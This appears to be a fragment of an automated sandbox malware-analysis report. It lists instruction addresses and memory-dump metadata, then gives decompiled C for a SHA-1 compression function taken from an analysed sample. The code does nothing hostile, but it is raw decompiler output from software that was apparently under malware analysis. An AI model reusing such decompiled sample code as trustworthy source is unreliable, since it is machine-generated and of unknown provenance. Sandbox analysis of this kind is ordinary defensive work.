                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17a56
                                                        0x00a17a56
                                                        0x00a17a59
                                                        0x00a17a5b
                                                        0x00a17a5e
                                                        0x00a17a5e
                                                        0x00a17a5e
                                                        0x00000000
                                                        0x00a17a56
                                                        0x00a1792c
                                                        0x00a1792f
                                                        0x00a17933
                                                        0x00a17935
                                                        0x00a1744b
                                                        0x00a1744b
                                                        0x00000000
                                                        0x00a1744b
                                                        0x00a1793b
                                                        0x00a1793e
                                                        0x00a17943
                                                        0x00a17945
                                                        0x00a1794f
                                                        0x00a17954
                                                        0x00a17956
                                                        0x00a17a06
                                                        0x00a17a06
                                                        0x00a17a09
                                                        0x00a17a0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17a11
                                                        0x00a17a17
                                                        0x00a17a1d
                                                        0x00a17a22
                                                        0x00a17a26
                                                        0x00a17a2c
                                                        0x00a17a35
                                                        0x00a17a38
                                                        0x00a17a38
                                                        0x00a17a38
                                                        0x00000000
                                                        0x00a17a3d
                                                        0x00a1795c
                                                        0x00a1795e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17964
                                                        0x00a1796a
                                                        0x00a1796c
                                                        0x00a17972
                                                        0x00a17976
                                                        0x00a17979
                                                        0x00a1797d
                                                        0x00a179cf
                                                        0x00a179d2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a179da
                                                        0x00a179da
                                                        0x00a179dd
                                                        0x00a179df
                                                        0x00a179e3
                                                        0x00a179e8
                                                        0x00a179ec
                                                        0x00a179ef
                                                        0x00a179f2
                                                        0x00a179f5
                                                        0x00a179f8
                                                        0x00a179fc
                                                        0x00a179fc
                                                        0x00a179fc
                                                        0x00000000
                                                        0x00a17a01
                                                        0x00a1797f
                                                        0x00a17982
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1798a
                                                        0x00a1798a
                                                        0x00a1798d
                                                        0x00a17990
                                                        0x00a17993
                                                        0x00a17998
                                                        0x00a1799e
                                                        0x00a179a4
                                                        0x00a179aa
                                                        0x00a179b0
                                                        0x00a179b6
                                                        0x00a179b9
                                                        0x00a179bc
                                                        0x00a179bf
                                                        0x00a179c2
                                                        0x00a179c5
                                                        0x00a179c5
                                                        0x00a179c5
                                                        0x00000000
                                                        0x00a179ca
                                                        0x00a178f3
                                                        0x00a178f7
                                                        0x00a178fc
                                                        0x00a178fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17907
                                                        0x00a1790c
                                                        0x00a1790e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1790e
                                                        0x00a174d5
                                                        0x00a174db
                                                        0x00a174de
                                                        0x00a174ef
                                                        0x00a174f2
                                                        0x00a174f2
                                                        0x00a174e0
                                                        0x00a174e0
                                                        0x00a174e0
                                                        0x00a174f4
                                                        0x00a174f7
                                                        0x00a174f9
                                                        0x00a17523
                                                        0x00a174fb
                                                        0x00a174fd
                                                        0x00a17504
                                                        0x00a1750c
                                                        0x00a1750e
                                                        0x00a17510
                                                        0x00a17518
                                                        0x00a1751e
                                                        0x00a1751e
                                                        0x00a17528
                                                        0x00a1752f
                                                        0x00a17535
                                                        0x00a1753b
                                                        0x00a17542
                                                        0x00a17570
                                                        0x00a17571
                                                        0x00a17572
                                                        0x00a17574
                                                        0x00a17590
                                                        0x00a17593
                                                        0x00a1759a
                                                        0x00a1759d
                                                        0x00a175a0
                                                        0x00a175ac
                                                        0x00a175b8
                                                        0x00a175ba
                                                        0x00a175c0
                                                        0x00a175c2
                                                        0x00a175c2
                                                        0x00a175c4
                                                        0x00000000
                                                        0x00a175c4
                                                        0x00a1757c
                                                        0x00a1757f
                                                        0x00a1757f
                                                        0x00a17581
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17583
                                                        0x00a17584
                                                        0x00a17587
                                                        0x00a1758a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1758c
                                                        0x00a1758e
                                                        0x00000000
                                                        0x00a17544
                                                        0x00a17546
                                                        0x00a17549
                                                        0x00a17553
                                                        0x00a1755b
                                                        0x00a17561
                                                        0x00a17564
                                                        0x00a175cc
                                                        0x00a175cc
                                                        0x00a175cf
                                                        0x00a175d2
                                                        0x00a175e2
                                                        0x00a175e5
                                                        0x00a175e5
                                                        0x00a175d4
                                                        0x00a175d4
                                                        0x00a175d4
                                                        0x00a175e7
                                                        0x00a175eb
                                                        0x00a175ee
                                                        0x00a175f2
                                                        0x00a175f4
                                                        0x00a175f8
                                                        0x00a175fa
                                                        0x00a1772b
                                                        0x00a1772b
                                                        0x00a17731
                                                        0x00a17733
                                                        0x00a17734
                                                        0x00a1773a
                                                        0x00a1773c
                                                        0x00a1773d
                                                        0x00a17743
                                                        0x00a17745
                                                        0x00a17745
                                                        0x00a17745
                                                        0x00a17743
                                                        0x00a1773a
                                                        0x00a17749
                                                        0x00a1774f
                                                        0x00a17755
                                                        0x00a17758
                                                        0x00a1775b
                                                        0x00a17766
                                                        0x00a17768
                                                        0x00a1776d
                                                        0x00a17770
                                                        0x00a17774
                                                        0x00a17776
                                                        0x00a178a7
                                                        0x00a178a7
                                                        0x00a178ab
                                                        0x00a178ae
                                                        0x00a178b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a178b6
                                                        0x00a178bc
                                                        0x00a178c0
                                                        0x00a178c6
                                                        0x00a178cb
                                                        0x00a178cf
                                                        0x00a178d5
                                                        0x00a178de
                                                        0x00a178e1
                                                        0x00a178e1
                                                        0x00a178e1
                                                        0x00000000
                                                        0x00a1777c
                                                        0x00a1777c
                                                        0x00a1777e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17784
                                                        0x00a1778a
                                                        0x00a1778d
                                                        0x00a17793
                                                        0x00a17797
                                                        0x00a1779a
                                                        0x00a1779e
                                                        0x00a177e9
                                                        0x00a177ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00a177f0
                                                        0x00a177f0
                                                        0x00a177f3
                                                        0x00a177f7
                                                        0x00a177f9
                                                        0x00a177fd
                                                        0x00a17802
                                                        0x00a17806
                                                        0x00a17809
                                                        0x00a1780c
                                                        0x00a1780f
                                                        0x00a17812
                                                        0x00a17816
                                                        0x00a17816
                                                        0x00a17816
                                                        0x00000000
                                                        0x00a177f9
                                                        0x00a177a0
                                                        0x00a177a3
                                                        0x00000000
                                                        0x00000000
                                                        0x00a177a7
                                                        0x00a177a7
                                                        0x00a177aa
                                                        0x00a177ad
                                                        0x00a177b0
                                                        0x00a177b5
                                                        0x00a177bb
                                                        0x00a177c1
                                                        0x00a177c7
                                                        0x00a177cd
                                                        0x00a177d3
                                                        0x00a177d6
                                                        0x00a177d9
                                                        0x00a177dc
                                                        0x00a177df
                                                        0x00a177e2
                                                        0x00a177e2
                                                        0x00a177e2
                                                        0x00000000
                                                        0x00a177e7
                                                        0x00a17600
                                                        0x00a17600
                                                        0x00a17603
                                                        0x00a176fe
                                                        0x00a17707
                                                        0x00a17711
                                                        0x00a17715
                                                        0x00a1771e
                                                        0x00a17721
                                                        0x00a17721
                                                        0x00a17724
                                                        0x00a17727
                                                        0x00a17727
                                                        0x00000000
                                                        0x00a17727
                                                        0x00a17609
                                                        0x00a1763f
                                                        0x00a1760b
                                                        0x00a1760e
                                                        0x00a17613
                                                        0x00a1761b
                                                        0x00a17623
                                                        0x00a17626
                                                        0x00a1762e
                                                        0x00a17635
                                                        0x00a1763a
                                                        0x00a1763a
                                                        0x00a17644
                                                        0x00a1764b
                                                        0x00a17651
                                                        0x00a17657
                                                        0x00a1765e
                                                        0x00a1768c
                                                        0x00a1768d
                                                        0x00a1768e
                                                        0x00a17692
                                                        0x00a17694
                                                        0x00a176b2
                                                        0x00a176b5
                                                        0x00a176c1
                                                        0x00a176c4
                                                        0x00a176c8
                                                        0x00a176cd
                                                        0x00a176e0
                                                        0x00a176e2
                                                        0x00a176e8
                                                        0x00a176ea
                                                        0x00a176ea
                                                        0x00a176ec
                                                        0x00000000
                                                        0x00a176ec
                                                        0x00a1769c
                                                        0x00a1769f
                                                        0x00a1769f
                                                        0x00a176a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a176a3
                                                        0x00a176a4
                                                        0x00a176a7
                                                        0x00a176aa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a176ac
                                                        0x00a176ae
                                                        0x00000000
                                                        0x00a17660
                                                        0x00a17662
                                                        0x00a17665
                                                        0x00a1766f
                                                        0x00a17677
                                                        0x00a1767d
                                                        0x00a17680
                                                        0x00a176f4
                                                        0x00a176f7
                                                        0x00000000
                                                        0x00a176f7
                                                        0x00a1765e
                                                        0x00a175fa
                                                        0x00a17542
                                                        0x00a174bb
                                                        0x00a174be
                                                        0x00a174be
                                                        0x00a174be
                                                        0x00000000
                                                        0x00a174be
                                                        0x00a1745f
                                                        0x00a17462
                                                        0x00a17462
                                                        0x00a17464
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17466
                                                        0x00a17467
                                                        0x00a1746a
                                                        0x00a1746d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1746f
                                                        0x00a17471
                                                        0x00000000
                                                        0x00a17471
                                                        0x00a17420
                                                        0x00a17423
                                                        0x00a1742d
                                                        0x00a17435
                                                        0x00a1743b
                                                        0x00a1743e
                                                        0x00a17441
                                                        0x00000000
                                                        0x00a17441
                                                        0x00a173ce
                                                        0x00a173d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a173d5
                                                        0x00a173e0
                                                        0x00a173e6
                                                        0x00a17c6f
                                                        0x00a17c6f
                                                        0x00000000
                                                        0x00a17c6f
                                                        0x00a173ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00a173f4
                                                        0x00a173fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a173fa
                                                        0x00a17376
                                                        0x00a17342
                                                        0x00a17313
                                                        0x00a17317
                                                        0x00a1731b
                                                        0x00a1731f
                                                        0x00a17327
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1934457230b8a5889079426b7d709a5a451781bce21afd7ed3a4cdc0267fc13d
                                                        • Instruction ID: 012bb442687c45053db479c89a08bdb4af6bb46640f4afb15f1e7174865d7b8c
                                                        • Opcode Fuzzy Hash: 1934457230b8a5889079426b7d709a5a451781bce21afd7ed3a4cdc0267fc13d
                                                        • Instruction Fuzzy Hash: 766201706087869FC719CF28C9809FDBBF1BB55304F14966DD8AA8B742D730EA95CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0EFEF Relevance: .7, Instructions: 694COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E00A0EFEF(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00A1F750(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E00A26354( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E00A26354(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E00A26354( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E00A26354( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E00A26354( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00A26354(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}












































































































                                                        0x00a0efef
                                                        0x00a0effb
                                                        0x00a0f007
                                                        0x00a0f011
                                                        0x00a0f016
                                                        0x00a0f01b
                                                        0x00a0effd
                                                        0x00a0effd
                                                        0x00a0f001
                                                        0x00a0f001
                                                        0x00a0f01e
                                                        0x00a0f027
                                                        0x00a0f029
                                                        0x00a0f02c
                                                        0x00a0f036
                                                        0x00a0f03c
                                                        0x00a0f040
                                                        0x00a0f058
                                                        0x00a0f063
                                                        0x00a0f065
                                                        0x00a0f067
                                                        0x00a0f06c
                                                        0x00a0f06f
                                                        0x00a0f073
                                                        0x00a0f077
                                                        0x00a0f07a
                                                        0x00a0f085
                                                        0x00a0f08a
                                                        0x00a0f0a4
                                                        0x00a0f0a9
                                                        0x00a0f0b4
                                                        0x00a0f0c1
                                                        0x00a0f0c6
                                                        0x00a0f0da
                                                        0x00a0f0e1
                                                        0x00a0f0eb
                                                        0x00a0f0f8
                                                        0x00a0f101
                                                        0x00a0f111
                                                        0x00a0f11d
                                                        0x00a0f11f
                                                        0x00a0f12a
                                                        0x00a0f12f
                                                        0x00a0f132
                                                        0x00a0f146
                                                        0x00a0f14d
                                                        0x00a0f154
                                                        0x00a0f15d
                                                        0x00a0f161
                                                        0x00a0f165
                                                        0x00a0f170
                                                        0x00a0f173
                                                        0x00a0f176
                                                        0x00a0f182
                                                        0x00a0f194
                                                        0x00a0f197
                                                        0x00a0f199
                                                        0x00a0f1af
                                                        0x00a0f1b7
                                                        0x00a0f1bb
                                                        0x00a0f1c6
                                                        0x00a0f1d8
                                                        0x00a0f1df
                                                        0x00a0f1e2
                                                        0x00a0f1e8
                                                        0x00a0f1ea
                                                        0x00a0f1ef
                                                        0x00a0f1f4
                                                        0x00a0f20a
                                                        0x00a0f213
                                                        0x00a0f215
                                                        0x00a0f218
                                                        0x00a0f21e
                                                        0x00a0f224
                                                        0x00a0f233
                                                        0x00a0f243
                                                        0x00a0f245
                                                        0x00a0f24b
                                                        0x00a0f24d
                                                        0x00a0f253
                                                        0x00a0f258
                                                        0x00a0f25c
                                                        0x00a0f262
                                                        0x00a0f266
                                                        0x00a0f270
                                                        0x00a0f277
                                                        0x00a0f27c
                                                        0x00a0f27d
                                                        0x00a0f281
                                                        0x00a0f285
                                                        0x00a0f289
                                                        0x00a0f289
                                                        0x00a0f289
                                                        0x00a0f28e
                                                        0x00a0f292
                                                        0x00a0f29a
                                                        0x00a0f2a0
                                                        0x00a0f2a3
                                                        0x00a0f2a6
                                                        0x00a0f2b5
                                                        0x00a0f2c4
                                                        0x00a0f2c6
                                                        0x00a0f2c9
                                                        0x00a0f2cf
                                                        0x00a0f2d9
                                                        0x00a0f2de
                                                        0x00a0f2e4
                                                        0x00a0f2e8
                                                        0x00a0f2ec
                                                        0x00a0f2f0
                                                        0x00a0f2f4
                                                        0x00a0f2f9
